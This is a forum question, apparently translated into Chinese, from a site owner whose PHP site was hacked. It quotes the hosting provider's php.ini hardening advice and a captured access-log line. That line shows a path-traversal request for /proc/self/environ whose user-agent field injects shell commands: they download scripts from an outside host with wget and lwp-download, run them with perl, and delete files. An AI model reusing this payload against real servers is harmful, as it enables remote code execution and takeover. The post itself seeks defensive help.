我的网站遭到网络钓鱼攻击。这是一个复杂的网站,但我只使用 post 和 PHP 文件。
他们怎么可能攻击我?我只使用 $_POST 所以我相信没有 SQL 命令和参数是可见的。没有框架,只有我在网站上的小编码列表和访问。
任何提示/建议将不胜感激。
抱歉,如果我没有直接回复,但我正在与阻止整个网站的提供商打交道。
这是他们的答案(欢迎对此发表任何评论):
由于脚本注入攻击站点代码本身,它能够完全避开网络服务器的安全性。不幸的是,一些内容管理系统(尤其是旧版本的 Joomla)极易受到这种形式的攻击。
消除攻击者使用此方法的能力的一种简单方法是在网站的顶层添加一个包含以下内容的 php.ini 文件 - 请注意,尽管该网站之后需要测试以确保没有合法的网站脚本操作已受到更改的影响:
php.ini 指令是...
allow_url_include = "0"
allow_url_fopen = "0"
更新:
这是我从虚拟主机公司得到的:
121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] “GET /?p=../../../../../../../../ ../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/ byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http: //some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"